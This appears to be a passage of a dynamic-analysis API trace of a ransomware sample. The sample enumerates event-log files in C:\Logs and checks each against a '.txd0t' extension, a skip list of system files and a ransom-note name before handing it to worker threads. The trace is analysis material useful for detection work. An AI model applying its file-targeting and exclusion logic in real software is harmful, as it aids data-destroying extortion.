psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" [0088.928] SetEvent (hEvent=0x408) returned 1 [0088.928] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0088.928] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=".") returned 1 [0088.928] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="..") returned 1 [0088.928] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.928] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.929] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" [0088.929] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned=".evtx" [0088.929] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2=" ransom ") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="debug.txt") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="boot.ini") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="ntldr") returned -1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.929] StrCmpIW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.929] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned=".evtx" [0088.929] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.929] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.980] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.981] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" [0088.981] SetEvent (hEvent=0x410) returned 1 [0088.981] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0088.981] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=".") returned 1 [0088.981] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="..") returned 1 [0088.981] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.981] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.981] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" [0088.981] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned=".evtx" [0088.981] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="bootsect.bak") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="iconcache.db") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="thumbs.db") returned -1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=" ransomware ") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=" ransom ") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="debug.txt") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="boot.ini") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="desktop.ini") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="autorun.inf") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="ntuser.dat") returned -1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="ntldr") returned -1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="ntdetect.com") returned -1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="bootfont.bin") returned 1 [0088.981] StrCmpIW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.981] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned=".evtx" [0088.981] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.981] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0088.988] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.989] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" [0088.989] SetEvent (hEvent=0x3fc) returned 1 [0088.989] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0088.989] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=".") returned 1 [0088.989] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="..") returned 1 [0088.989] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.989] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.989] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" [0088.989] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned=".evtx" [0088.989] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="bootsect.bak") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="iconcache.db") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="thumbs.db") returned -1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=" ransomware ") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=" ransom ") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="debug.txt") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="boot.ini") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="desktop.ini") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="autorun.inf") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="ntuser.dat") returned -1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="ntldr") returned -1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="ntdetect.com") returned -1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="bootfont.bin") returned 1 [0088.989] StrCmpIW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.989] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned=".evtx" [0088.990] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.990] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0088.997] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.997] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" [0088.997] SetEvent (hEvent=0x408) returned 1 [0088.997] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cAlternateFileName="MICA77~1.EVT")) returned 1 [0088.997] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=".") returned 1 [0088.997] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="..") returned 1 [0088.997] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.997] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.997] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" [0088.997] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned=".evtx" [0088.997] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="bootsect.bak") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="iconcache.db") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="thumbs.db") returned -1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=" ransomware ") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2=" ransom ") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="debug.txt") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="boot.ini") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="desktop.ini") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="autorun.inf") returned 1 [0088.997] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="ntuser.dat") returned -1 [0088.998] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="ntldr") returned -1 [0088.998] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="ntdetect.com") returned -1 [0088.998] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="bootfont.bin") returned 1 [0088.998] StrCmpIW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.998] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned=".evtx" [0088.998] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.998] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.033] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.033] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" [0089.033] SetEvent (hEvent=0x418) returned 1 [0089.033] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cAlternateFileName="MI1E8D~1.EVT")) returned 1 [0089.033] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=".") returned 1 [0089.033] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="..") returned 1 [0089.033] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.033] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.033] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" [0089.033] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned=".evtx" [0089.033] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=" ransom ") returned 1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="debug.txt") returned 1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="boot.ini") returned 1 [0089.033] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.034] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.034] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.034] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="ntldr") returned -1 [0089.034] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.034] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.034] StrCmpIW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.034] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned=".evtx" [0089.034] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.034] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.064] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.064] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" [0089.064] SetEvent (hEvent=0x408) returned 1 [0089.064] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cAlternateFileName="MID067~1.EVT")) returned 1 [0089.065] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=".") returned 1 [0089.065] StrCmpW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="..") returned 1 [0089.065] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.065] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.065] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" [0089.065] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned=".evtx" [0089.065] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2=" ransom ") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="debug.txt") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="boot.ini") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="ntldr") returned -1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.065] StrCmpIW (psz1="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.065] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned=".evtx" [0089.065] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.065] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.071] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.071] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" [0089.071] SetEvent (hEvent=0x418) returned 1 [0089.071] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0089.071] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=".") returned 1 [0089.072] StrCmpW (psz1="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2="..") returned 1 [0089.072] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.072] StrNCatW (in: psz1="C:\\Logs", psz2="\\", 